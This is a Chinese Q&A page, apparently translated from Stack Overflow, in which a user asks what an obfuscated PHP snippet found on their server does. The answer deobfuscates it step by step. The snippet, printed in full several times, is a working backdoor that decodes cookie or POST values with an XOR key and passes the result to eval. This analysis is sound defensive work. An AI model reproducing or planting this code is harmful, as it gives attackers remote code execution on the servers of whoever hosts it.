php - 这个恶意代码有什么用?
问题描述
我在主机上找到了这段代码,它似乎是由黑客编写的,这段代码是做什么用的?
<?php $zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';$ivlmhe = Array();$ivlmhe[] = $zbsdho[34].$zbsdho[32];$ivlmhe[] = $zbsdho[1].$zbsdho[24].$zbsdho[21].$zbsdho[17].$zbsdho[20].$zbsdho[13].$zbsdho[4].$zbsdho[0].$zbsdho[26].$zbsdho[3].$zbsdho[20].$zbsdho[17].$zbsdho[31].$zbsdho[26].$zbsdho[0].$zbsdho[0].$zbsdho[20].$zbsdho[20].$zbsdho[26].$zbsdho[7].$zbsdho[7].$zbsdho[27].$zbsdho[3].$zbsdho[26].$zbsdho[27].$zbsdho[3].$zbsdho[24].$zbsdho[17].$zbsdho[14].$zbsdho[14].$zbsdho[6].$zbsdho[3].$zbsdho[14].$zbsdho[20].$zbsdho[4].$zbsdho[14];$ivlmhe[] = $zbsdho[15];$ivlmhe[] = $zbsdho[14].$zbsdho[18].$zbsdho[16].$zbsdho[22].$zbsdho[9];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[28].$zbsdho[12].$zbsdho[17].$zbsdho[23].$zbsdho[17].$zbsdho[21].$zbsdho[9];$ivlmhe[] = $zbsdho[17].$zbsdho[33].$zbsdho[23].$zbsdho[29].$zbsdho[18].$zbsdho[24].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[16].$zbsdho[7].$zbsdho[30].$zbsdho[9].$zbsdho[12];$ivlmhe[] = $zbsdho[21].$zbsdho[12].$zbsdho[12].$zbsdho[21].$zbsdho[2].$zbsdho[28].$zbsdho[11].$zbsdho[17].$zbsdho[12].$zbsdho[10].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[29].$zbsdho[17].$zbsdho[22];$ivlmhe[] = $zbsdho[23].$zbsdho[21].$zbsdho[14].$zbsdho[8];foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf){function ogehexx($ivlmhe, $owoafjz, $oibsdj){return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);}function lxasj($ivlmhe, $arihtmu){return @$ivlmhe[9]($ivlmhe[0], $arihtmu);}function jxlby($ivlmhe, $arihtmu){$flgqwzt = $ivlmhe[3]($arihtmu) % 3;if (!$flgqwzt) {eval($arihtmu[1]($arihtmu[2]));exit();}}$nunarwf = lxasj($ivlmhe, $nunarwf);jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));}
解决方案
首先从美化代码开始:
<?php
$zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';
$ivlmhe = Array();
$ivlmhe[] = $zbsdho[34] . $zbsdho[32];
$ivlmhe[] = $zbsdho[1] . $zbsdho[24] . $zbsdho[21] . $zbsdho[17] . $zbsdho[20] . $zbsdho[13] . $zbsdho[4] . $zbsdho[0] . $zbsdho[26] . $zbsdho[3] . $zbsdho[20] . $zbsdho[17] . $zbsdho[31] . $zbsdho[26] . $zbsdho[0] . $zbsdho[0] . $zbsdho[20] . $zbsdho[20] . $zbsdho[26] . $zbsdho[7] . $zbsdho[7] . $zbsdho[27] . $zbsdho[3] . $zbsdho[26] . $zbsdho[27] . $zbsdho[3] . $zbsdho[24] . $zbsdho[17] . $zbsdho[14] . $zbsdho[14] . $zbsdho[6] . $zbsdho[3] . $zbsdho[14] . $zbsdho[20] . $zbsdho[4] . $zbsdho[14];
$ivlmhe[] = $zbsdho[15];
$ivlmhe[] = $zbsdho[14] . $zbsdho[18] . $zbsdho[16] . $zbsdho[22] . $zbsdho[9];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[28] . $zbsdho[12] . $zbsdho[17] . $zbsdho[23] . $zbsdho[17] . $zbsdho[21] . $zbsdho[9];
$ivlmhe[] = $zbsdho[17] . $zbsdho[33] . $zbsdho[23] . $zbsdho[29] . $zbsdho[18] . $zbsdho[24] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[16] . $zbsdho[7] . $zbsdho[30] . $zbsdho[9] . $zbsdho[12];
$ivlmhe[] = $zbsdho[21] . $zbsdho[12] . $zbsdho[12] . $zbsdho[21] . $zbsdho[2] . $zbsdho[28] . $zbsdho[11] . $zbsdho[17] . $zbsdho[12] . $zbsdho[10] . $zbsdho[17];
$ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[29] . $zbsdho[17] . $zbsdho[22];
$ivlmhe[] = $zbsdho[23] . $zbsdho[21] . $zbsdho[14] . $zbsdho[8];
foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf) {
function ogehexx($ivlmhe, $owoafjz, $oibsdj)
{
return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);
}
function lxasj($ivlmhe, $arihtmu)
{
return @$ivlmhe[9]($ivlmhe[0], $arihtmu);
}
function jxlby($ivlmhe, $arihtmu)
{
$flgqwzt = $ivlmhe[3]($arihtmu) % 3;
if (!$flgqwzt) {
eval($arihtmu[1]($arihtmu[2]));
exit();
}
}
$nunarwf = lxasj($ivlmhe, $nunarwf);
jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));
}
然后我们找到位于的值$ivlmhe:
array(10) {
[0]=> string(2) "H*"
[1]=> string(36) "9dae5f74-85e2-4455-bb08-08decc38c57c"
[2]=> string(1) "#"
[3]=> string(5) "count"
[4]=> string(10) "str_repeat"
[5]=> string(7) "explode"
[6]=> string(6) "substr"
[7]=> string(11) "array_merge"
[8]=> string(6) "strlen"
[9]=> string(4) "pack"
}
然后:
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
function ogehexx($ivlmhe, $key, $oibsdj)
{
return substr(str_repeat($key . "9dae5f74-85e2-4455-bb08-08decc38c57c", ($oibsdj / strlen($key)) + 1), 0, $oibsdj);
}
function lxasj($ivlmhe, $arihtmu)
{
return @pack("H*", $arihtmu);
}
function jxlby($ivlmhe, $arihtmu)
{
$flgqwzt = count($arihtmu) % 3;
if (!$flgqwzt) {
eval($arihtmu[1]($arihtmu[2]));
exit();
}
}
$value = lxasj($ivlmhe, $value);
jxlby($ivlmhe, explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value))));
}
到目前为止,这就是我能够解码的全部内容,他们对$_COOKIE&$_POST变量感兴趣,并对它们执行各种功能。
我最初在函数中犯了一个错误jxlby,我已经把它改成了它应该是的......eval()这个函数中的部分将是令人讨厌的部分,但我发现很难弄清楚究竟是什么被评估为输入这个函数$arihtmu来自这一行,其中有一个按位 Xor 运算符explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value)))
推荐阅读
- css - width vs. flex-basis: [width] - 元素被扩展了?
- marketo - 如何通过 API 在 Marketo 中的列表中添加潜在客户(电子邮件、姓名)
- google-cloud-storage - Google Cloud CDN 忽略超过 3600 的 max-age
- android - WebView 不显示结果
- django - Django 模型 - 接口设计以避免在 父类中定义的 CHILD 类调用方法中传递对象
- excel - 当数据存在于另一列中时循环一个列中的公式
- reactjs - React - componentWillReceiveProps 不调用
- c# - 我可以使用 Matlab Coder 为 C# 项目生成 .Net dll 吗?
- java - 将 JAVA 日期更改为 (dd-MMM-yy) 的 ORACLE 日期格式
- jquery - ASP.NET - 在离开页面或切换选项卡之前警告用户未保存的更改